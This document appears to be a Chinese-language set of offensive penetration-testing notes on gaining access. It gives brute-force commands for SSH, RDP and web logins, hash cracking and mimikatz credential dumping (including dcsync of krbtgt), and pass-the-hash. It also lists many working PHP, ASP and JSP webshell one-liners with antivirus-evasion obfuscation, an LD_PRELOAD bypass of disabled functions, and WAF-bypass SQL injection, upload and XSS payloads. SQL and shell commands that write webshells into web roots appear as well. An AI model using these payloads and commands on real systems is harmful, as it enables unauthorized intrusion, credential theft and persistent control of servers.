# 获取权限

&nbsp;

## 密码破解

### 【用户登录服务攻击】

* **爆破ssh和rdp服务**
  * （1）解压rockyou文件
    ```bash
    gzip -d rockyou.txt.gz
    ```
  * （2）爆破ssh
    ```bash
    hydra -l admin -P /usr/share/wordlist/rockyou.txt ssh://192.168.2.200 -t 4
    ```
    >一般使用-t 4，进行4次连接后等待一段时间后再次连接，避免ssh锁定主机

  * （3）爆破rdp
    ```bash
    hydra -l admin -P ./rockyou.txt rdp://192.168.2.200
    ```
    一般爆破rdp的3389端口，如果其他端口可以指定
    我们用在数据库泄漏中发现的密码标识了两个用户名。我们应该一直尝试利用我们发现的每个明文密码，将它们喷洒到目标系统中。这可能会暴露出在多个系统中使用相同密码的用户。
  
* **爆破HTTP POST表单**
  * （1）爆破POST登录
    ```bash
    hydra -l user -P /rockyou.txt 192.168.2.20 http-post-form "/index.php:user=user&pass=^PASS^:Login failed.Invalid"
    ```
    
### 【密码生成工具】

* **cewl工具**
  * Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外，Cewl还提供了命令行工具。
  * 默认生成
    ```bash
    cewl http://192.168.2.200/
    ```
    爬虫会爬取网页中的信息组成字典并且显示在屏幕上
    
  * 特定生成
    ```bash
    cewl -d 5 -m 8 http://abc.com --with-numbers -w wordlist.txt
    ```
    -d 代表爬取的深度，-m 密码字典每个密码的最小长度，-w 将输出存储为文件，--with-numbers 生成包含数字和字符的字典文件
    
  * 爬取email
    ```bash
    cewl http://abc.com -n -e
    ```
    -e选项来启用Email参数，并配合-n选项来隐藏工具在爬取网站过程中生成的密码字典
    
* **crunch工具**
  crunch <min-len>  <max-len>  [<charset string>] [options]
  * 生成密码
    ```bash
    crunch 6 6 123 -o wordlist.txt
    ```
    生成6位，由123组成的密码
  * 读取文件生成
    ```bash
    crunch 1 1 -q read -o wordlist.txt
    ```
    读取read文件中每行内容作为基本字符生成字典
  * 特定密码
    ```bash
    crunch 4 4 -t %^@
    ```
    生成长度四位的字典集，第一位为数字，第二位为特殊字符，第三位是小写字符，第四位是大写字符
    ```bash
    crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha-numeric -o w.txt -s 1a2b
    ```
    以charset.lst密码库的mixalpha-numeric模块为字符集，以1a1b为开始字符，生成长度为四的字典集，输出到w.txt


### 【破解hash】

* **密码hash破解方法**
  * （1）Extract hashes 提取hash值
  * （2）Format hashes 使用hash-identify 或者hashid确认hash的种类
  * （3）Calculate the cracking time 计算破解时间
  * （4）Prepare wordlist 准备字典
  * （5）Attack the hash 爆破字典

* **提取密码hash**
  * window中可以使用Get-ChildItem寻找对应的密码hash文件
    ```powershell
    Get-ChildItem -Path c:\ -Include *.kdbx -File -Recure -ErrorAction silentlyContinue
    ```
  * linux中使用find命令寻找hash文件
    ```bash
    find / -type f -name "hahs文件名称" 2>/dev/null
    ```


* **确认hash类型**
  * 使用hash-identify或者hashid
    ```bash
    hash-identify 'hash值'
    hashid hash值
    ```

* **计算破解时间**
  * 使用hashcat了解hash爆破速度
    ```bash
    hashcat -b
    ```
    显示hashcat破解各种加密方式使用的时间
  
* **密码变形**
  有时手中的字典中有些条目不满足密码安全原则，需要删除某些条目或者怎加条目
  
  * （1）使用sed或者hashcat修改wordlist来符合目标密码安全规则（比如最少6位密码，含有大小写）
    ```bash
    sed -i '/^1/d' wordlist.txt
    ```
    删除1开头的字段
  
  * （2）使用hashcat对字典进行变形
    ```bash
    hashcat -r rule.txt --stdout wordlist.txt
    ```
    -r 指定规则，存储在rule.txt文件里
    例如：c $1 $2 $!（开头字母大写，在每个字典条目后加上12！）
    $1 在字段后面加上1
    ^1 在字段首部加上1
    c 开头字母大写
    C 开头字母小写
    l 字母全部小写
    u 字母全部大写
    T3 将位置3处的字母大小写切换
    sXY 将字符X替换为Y

* **爆破hash文件**
  * （1）使用JtR套件将提取的hash文件格式化
    ```bash
    举例：将提取keepass hash数据库格式化
    keepass2john Database.kdbx > crackme.hash
    ```
    格式化后，要使用编辑器删除第一行的文件名称

  * （2）使用hashcat爆破hash值
    确认hash加密方式在hashcat中的代号
    ```bash
    hashcat --help | grep -i "需要查找的加密方式"
    ```
    爆破crackme密文
    ```bash
    hashcat -m 0 crackme.hash /usr/share/wordlist/rockyou.txt -r rule.txt --force
    ```
    
  * （3）使用john爆破hash值
    首先编辑john配置文件使用rule规则爆破
    ```bash
    kali@kali:~/passwordattacks$ cat ssh.rule
    [List.Rules:sshRules]
    c $1 $3 $7 $!
    c $1 $3 $7 $@
    c $1 $3 $7 $#
    
    kali@kali:~/passwordattacks$ sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
    ```
    使用rule爆破
    ```bash
    john --wordlist=/usr/share/wordlist/rockyou.txt --rules=sshRules
    ```

### 【windows中的hash】

* **提取NTML hash**
  * （1）SAM文件位置
    window中加密后的hash密码存储在SAM文件中
    >windowNT 4.0 sp3后SAM文件被加密，密码分为两种LM和NTLM，但是由于加密过于薄弱，在window vista 和window server 2008后被默认不启用
    >2012server版本以及之前的版本，可以从内存中读取管理员明文密码，2012以后需要修改注册表后再可以读取内存

    SAM文件在c:\Windows\system32\config\sam
    
  * （2）gethashes提取hash
    需要管理员权限方可执行读取hash操作
    ```cmd
    gethashes.exe  $local
    ```
    gsecdump
    -h  显示帮助
    -a  获取所有密码信息
    -s 从sam文件和域控中获取hash值
    -u 获取当前登录用户的hash
    -w  获取无线密码
  

  * （3）使用mimikatz提取NTML hash
    mimikatz原理：
    使用sekurlsa模块读取LSASS进程的内存，获取用户hash
    >LSASS（Local Security Authority Subsystem）管理用户hash以及认证信息

    使用条件：
    开启SeDebugPrivilege，这个设置可以使我们debug不属于我们的进程
    ```bash
    mimikatz# privilege::debug  开启SeDebugPrivilege权限
    mimikatz# token::elevate 获取system权限token
    mimikatz# lsadump::sam 读取SAM中的用户凭证
    
    抓取hash
    mimikatz# sekurlsa::logonpasswords   //获取当前在线用户的明文密码（需要高权限运行）
    mimikatz# lsadump::lsa /patch   //获取当前此计算机存在过用户的NTLMHASH
    
    mimikatz的其他命令
    mimikatz# lsadump::sam SYSTEM.hiv //导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份
    
    通过内存文件获取口令
    mimikatz# sekurlsa::minidump lsass.dmp
    mimikatz# sekurlsa::logonPasswords full
    拉取 rd.adsecurity.org 域中的 KRBTGT 用户帐户的密码数据
    mimikatz# lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt
    拉取 lab.adsecurity.org 域中 ADSDC03 域控制器的计算机帐户的密码数据
    mimikatz# lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$
    
    ```
  
* **pass-the-hash PtH**
  有些时候破解hash时间过于长，所以选择pass the hash方法，即登录使用NTML hash，不使用帐号密码
  此外，如果我们在一个目标上发现一个hash，我们不仅可以使用它来对该目标进行身份验证，还可以对另一个目标进行身份验证，只要第二个目标具有具有相同用户名和密码的帐户。
  >自 WindowsVista 以来，所有 Windows 版本都默认启用了 UAC 远程限制1。这会阻止软件或命令在远程系统上使用管理权限运行。
  
  * 使用NTMLhash 登录远程smb服务
    ```bash
    smbclient //192.168.2.200/secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
    ```
    
  * 使用NTMLhash返回一个反弹shell
    ```bash
    impacket-psexec -hashs 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.2.200
    ```
    psexec会使用NTML hash登录目标文件共享，并且写入shell，通过设置windows 服务执行shell，获得反弹shell
    获取system32权限
    或者使用wpexec获取目标administrator权限
    



https://www.freebuf.com/articles/network/190128.html

https://www.icekam.com/post/wfuzz-web-blasting-and-exhaustive-tools/

### 【破解压缩包】

* **破解zip**
  * 使用zip2john转化为hash
    ```bash
    zip2john abc.zip > abc.hash
    ```
  * 修改abc.hash文件
    ```
    修改前：
    zipdecrypt.txt.zip/zipdecrypt.txt:$pkzip$1*2*2*0*37*2b*887a34f6*0*48*0*37*b859.....
    修改后：
    $pkzip$1*2*2*0*37*2b*887a34f6*0*48*0*37*b859*4041d4c6ce......
    ```
  * 使用hashcat爆破
    ```bash
    hashcat -m 17225 abc.hash /usr/wordlist/rockyou.txt
    ```
  
* **破解rar**
  * 使用rar2john转化
    ```bash
    rar2john abc.rar > abc.hash
    ```
  * 修改hash文件
  * 使用hahscat爆破
    ```bash
    hashcat -m 13000 abc.hash wordlist.txt
    ```


&nbsp;

## Webshell

### 【webshell工作原理】

* **一句话木马**
  * （1）工作原理：
    黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码：
    ```asp
    <%execute request("value")%>
    ```
    这就被称为一句话木马，它是基于B/S结构的。
    ><%eval request("value")%>(现在比较多见的，而且字符少，对表单字数有限制的地方特别的实用)
  
  
  * （2）常见写法:
    asp一句话木马：
    ```asp
    <%eval request("c")%>
    ```
    php一句话木马：
    ```php
    <?php @eval($_POST[value]);?>
    ```
    aspx一句话木马：
    ```aspx
    <%@ Page Language="Jscript"%>，<%eval(Request.Item["value"])%>
    ```
    jsp一句话：
    ```jsp
    <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
    ```
    
  
* **小马**
  * （1）工作原理：
    小马体积小，容易隐藏，隐蔽性强，最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行，不过功能少，一般只有上传等功能。
  * （2）常见写法
    ```php
      <?php
    $test='<?php $a=$_POST["cmd"];assert($a); ?>';
    file_put_contents("Trojan.php", $test);
    ?>
    ```
    
  * （3）小马使用：主要上传大马

* **大马**
  * （1）介绍:
    大马体积比较大  一般50K以上。功能也多，一般都包括提权命令，磁盘管理，数据库连接借口，执行命令甚至有些以具备自带提权功能和压缩，解压缩网站程序的功能。这种马隐蔽性不好，而大多代码如不加密的话很多杀毒厂商开始追杀此类程序
    
  * （2）大马使用：提权，脱库，增删文件


### 【webshell免杀技巧】

* **内容编码**
  * （1）使用字符串拼接关键词：
    ```php
    <?php $_REQUEST['a']($_REQUEST['b']); ?>
    <?php ($_=@$_GET[2]).@$_($_POST[sz])?>
    <?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?>
    <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);?>
    <?php $a = "a"."s"."s"."e"."r"."t";  $a($_POST["sz"]); ?>
    ```
    ```asp
    <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
    <%a=request("gold")%><%eval a%>
    ```
  * （2）使用字符编码：
    ```php
    <%Eval(Request(chr(112)))%>
    <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("xindong"))%>
    ```
  
* **一句话图片木马**
  * （1）寻找图片使用c32或者hex打开的软件打开图片
  * （2）将一句话木马插入到图片中
  * （3）实验将图片上传到服务器，并且更改后缀为服务器对应的脚本
  * （4）使用菜刀或者webshell连接器进行连接，如果不成功则是图片中的某些字符干扰了一句话木马，跟换图片再试
  * （5）上传图片格式配置解析漏洞拿shell
  * （6）文件包含拿shell


### 【waf防护】

* **防护原理**
  * user-agent进行拦截，可以使用爬虫的网址进行绕过，例如百度爬虫（一般使用白名单）
  * http检测可以使用post或者cookie值进行绕过（有些之拦截get提交方式）
  * http头获取ip可以修改remote-ip或者client-ip
  * 文件上传后缀防护
  * 敏感函数防护
  * 危险组件防护
  * 禁止执行程序
  * 一句话拦截
  * 内容防护中，会对访问目标进行过滤，有时是使用账号密码，有时是ip限制
  * cc攻击防护，限制攻击次数可绕过，或者变换ip


* **waf绕过方法**
  * （1）目录扫描防护绕过
    问题：扫描不到任何信息（IP封锁，一般为硬件防火墙，连接重置），扫出来一堆东西（含有waf）
    * 解决方法：
      * 降低扫描速度
      * 爬行工具爬行目录
      * 修改user-agent
      * 尝试代理ip池
      * 可以尝试白名单服务器扫描（使用加了白名单ip）例如：阿里云可以使用阿里云服务器
    
  * （2）特殊文件访问拦截绕过
    问题：拦截特殊后缀的文件访问，例如xxx.sql或者是xxx.mdb
    * 解决方法：
      * 修改后缀加入垃圾字符搭配匹配规则
      * 加入垃圾字符超过拦截长度，绕过防御
      * 文件解析，目录解析绕过
    
  * （3）命令执行函数被禁绕过
    * 解决方法：
    编写hack.c
    ```c
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h> 
    void payload() {
        system("rm /tmp/check.txt");
    }   
    int  geteuid() {
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    unsetenv("LD_PRELOAD");
    payload();
    }
    ```
    ```bash
    $ gcc -c -fPIC hack.c -o hack 
    $ gcc -shared hack -o hack.so
    ```
    
    再上传到webshell上，然后写一段简单的php代码：
    ```php
    <?php
    putenv("LD_PRELOAD=/var/www/hack.so");
    mail("a@localhost","","","","");
    ?>
    ```
    在浏览器中打开就可以执行它，然后再去检查新建的文件是否还存在，找不到文件则表示系统成功执行了删除命令，也就意味着绕过成功，测试中注意修改为实际路径。
    
  * （4）访问受限绕过***********


* **注入漏洞绕过waf**
  * （1）大小写变种
    使用起来最简单，效果现在来说不太显著
    比如：
    ```
    and 1=2
    AnD 1=3
    ```
    
  * （2）使用SQL注释
    使用起来简单，效果一般
    ```sql
    union select 1,2,3,4,5,5 from admin
    ```
    注释完：
    ```sql
    /**/union/**/select/**/1,2,3,4,5,5 from admin
    /**/un/**/io/**/n/**/sel/**/ec/**/t/**/1,2,3,4,5,5 from admin
    ```
    第二种注释
    ```sql
    /*!and*/ 1=2  效果显著
    ```
    
  * （3）使用URL编码
    正常编码
    ```
    ' 为%27  
    / =%2f    *==%2a   %=%25
    /**/==%252f%252a*/
    ```
    
  * （4）使用空字节
    一些过滤器在处理输入时，如果碰到空字节就会停止处理。
    我们通常也会利用空字节进行绕过过滤器，如：
    ```sql
    id=1 %00 and 1=2
    ```
    access数据库中可以使用%0a代替空格  %0a/%a/ + /%%%%0a
    mysql中/**/代替空格  /\*and\*/
    
  * （5）使用嵌套过剥离
    有些过滤器会从用户的输入中进行剥离一些敏感的函数
    那我们可以通过函数的嵌套进行绕过一次剥离，selselectect，剥离后，select
    
  * （6）使用非标准入口点
    说白了就是攻击他的冷门，需要自己去挖掘，一些连过滤器都没发现的注入点即可
    
  * （7）避开自定义过滤器
    一些过滤器他所过滤的字符串都是事先写入写好的，
    只要我们输入的的语法和他们过滤的不匹配即可绕过。比如 and，转换为a+nd，a%nd，'a'nd，%A0and
  * （8）更换提交方式
    一些信息提交页面如果get提交不了，被防护，还可以试试post提交
  * （9）截断关键字
    access数据库中：
    %%%%截断关键字 an%%%%%d 1%%%%%=%%1 可以使waf检测不到关键字
  
* **webshell过waf**
  * （1）一句话过waf
    使用动态传参，不构成waf查杀的函数
    或者使用菜刀软件
    当客户端怎么都过不掉waf时，可以将大马进行免杀
    使用站马分离（上传免杀小马，其中使用远程代码加载大马代码到目标服务器上执行）有时需要改写大马代码
    
  * （2）大马免杀
    可以使用图片码绕过waf
    可以使用站马分离
  
* **上传过waf**
  * （1）长度绕过，增加垃圾长度
    ```
    Content-Disposition：for++++++++++++++++m-data；name=“upfile”；filename=“1.php”
    
    Content-Disposition：form-data；name=“upfile”；ahfoaweihaoiehwnv；filename=“1.php”
    ```
  * （2）文件名称引号不对称
    ```
    filename=“1.php
    filename=”1.php“”
    ```
  * （3）文件名多个=号
    ```
    filename==========“1.php”
    ```
  * （4）文件名称里添加分号或者垃圾字符
    ```
    filename=“1 xvzdva&s；1.php”
    ```
  * （5）文件名称换行
    ```
    filename=
       “1.php”
    ```
  * （6）删除bannery信息

* **XSS payload过waf**
  
  * （1）编码绕过
    第一个，html实体编码，例如：&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x29;
    第二个，进制类，例如：\x61\x6c\x65\x72\x74\x60\x78\x73\x73\x60，某些时候，也有不带x,例如：\5c\6a
    第三个，Unicode，例如：\u0061\u006c\u0065\u0072\u0074\u0060\u4e2d\u6587\u4e5f\u53ef\u4ee5\u0060
    第四个，纯转义，例如：\'   \"   \<   \> ,这样的在特殊字符前加\进行转义。
  * （2）字符拼接
  * （3）js加密
  * （4）调用后缀修改

### 【后台拿shell方法总结】

* **管理员拿shell**
  * （1）条件
    需要有管理员权限才可以拿shell
    通常需要登录后台后执行相关操作
  * （2）方法
    直接上传脚本getshell（国外居多）
    多找模式或者性能设置，可以得到上传类型修改
    当没有权限浏览上一级目录，可以将上传的文件改名，即改为 ../1.php（目录跳跃）
  
* **数据库备份拿shell**
  * （1）条件
    网站具有数据库备份功能
    含有权限操作数据库备份
  * （2）方法
    网站对上传的文件后缀进行过滤，不允许上传脚本类型文件如asp/php/jsp/aspx等
    而网站具有数据库备份功能，这时我们就可以将webshell格式先该为允许上传的文件格式如jpg，gif等
    然后，我们找到上传后的文件路径，通过数据库备份，将文件备份为脚本格式

* **突破上传拿shell**
  * （1）方法
    本地js验证绕过上传
    服务器mime绕过上传
    服务器白名单绕过上传
    服务器黑名单绕过上传
    服务器 filepath上传
    双文件上传
    %00截断上传
  
* **利用解析漏洞拿webshell**
  * （1）方法
    IIS 5.x/6.0解析漏洞
    IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
    Nginx <8.03 空字节代码执行漏洞
    Apache解析漏洞
  
* **网站配置插马拿shell（慎用，可能网站会奔溃）**
  * （1）条件
    要知道马插到哪里，是数据库还是配置文件中
    知道配置文件中代码格式，要进行闭合
    长度问题
    转义字符问题
  * （2）方法
    通过找到网站默认配置，将一句话插入到网站配置中，不过为了能够成功执行插马，建议先下载该网站源码，进行查看源码过滤规则，以防插马失败。
  
* **通过编辑模板拿webshell**
  * 方法
    通过对网站的模板进行编辑写入一句话，然后生成脚本文件拿webshell。
    通过将木马添加到压缩文件，把名字改为网站模板类型，上传到网站服务器，拿webshell
  
* **上传插件拿shell**
  * （1）条件
    一些网站为了增加某些功能会在后台添加一些 插件来实现
  * （2）方法
    一般将马与插件绑定在一起，不需要启动，只是知道马在哪就可以了
    我们可以把木马添加到安装的插件中上传服务器拿shell
  
* **数据库执行拿webshell**
  * （1）方法
    我们可以通过数据库执行命令导出一句话到网站根目录拿shell
    access 数据库导出 一般需要利用解析漏洞xx.asp;.xml
    sqlserver 导出
    ```sql
    ;exec%20sp_makewebtask%20%20%27c:\inetpub\wwwroot\ms\x1.asp%27,%27select%27%27<%execute(request("cmd"))%>%27%27%27-- 
    ```
    mysql命令导出shell
    ```sql
    Create TABLE study (cmd text NOT NULL);
    Insert INTO study (cmd) VALUES('<?php eval ($_POST[cmd]) ?>');
    select cmd from study into outfile 'D:/php/www/htdocs/test/seven.php';
    Drop TABLE IF EXISTS study;
    ```
    >如果没有权限执行into outfile函数时，可以利用日志生成来注入马，前提是能修改日志位置
    
    ```sql
    use mysql;
    create table x(packet text) type=MYISaM;
    insert into x (packet) values('<pre><body ><?php @system($_GET["cmd"]); ?></body></pre>')
    select x  into outfile 'd:\php\xx.php'
    ```
    ```sql
    select '<?php eval($_POST[cmd]);?>' into outfile 'C:/Inetpub/wwwroot/mysql-php/1.php'
    ```
  * （2）推理网站根目录
    找到mysql安装目录（select @@basedir）
    读取apache配置文件
    寻找documentroot项，显示网站根目录
  
* **文件包含拿webshell**
  * （1）条件
    包含的文件可以被用户修改
  * （2）方法
    先将webshell该为txt文件上传，然后上传一个脚本文件包含该txt文件，可绕过waf拿webshell
  
* **命令执行拿shell**
  * （1）方法
    ```bash
    Echo ^<^?php @eval($_POST['cracer']);?^>^ > c:\1.php
    ```
    ```bash
    Echo ^<^?php @eval($_POST['cracer']);?^>^ > c:\1.php
    ```
    ```bash
    ^<^%eval request("cracer")%^>^ > c:\1.php
    ```
    
### 【前台拿shell方法总结】*

* **普通用户前台拿shell**
  * 0day拿webshell
  * IIS写权限拿webshell
  * 命令执行拿webshell
  * 通过注入漏洞拿webshell
  * 前台用户头像上传拿webshell
  * strusts2拿webshell
  * java反序列拿shell

### 【未知cms拿shell方法】

* **前台检测**
  * 检测前台有没有注入、编辑器、上传、接口。
  * 检测中间件有无漏洞来拿shell
* **后台检测**
  * 检测后台所有功能、包括上传接口，和已知编辑器。
  * 检测数据库备份，标题配置等位置。
  * 检测容器版本，看是否能利用
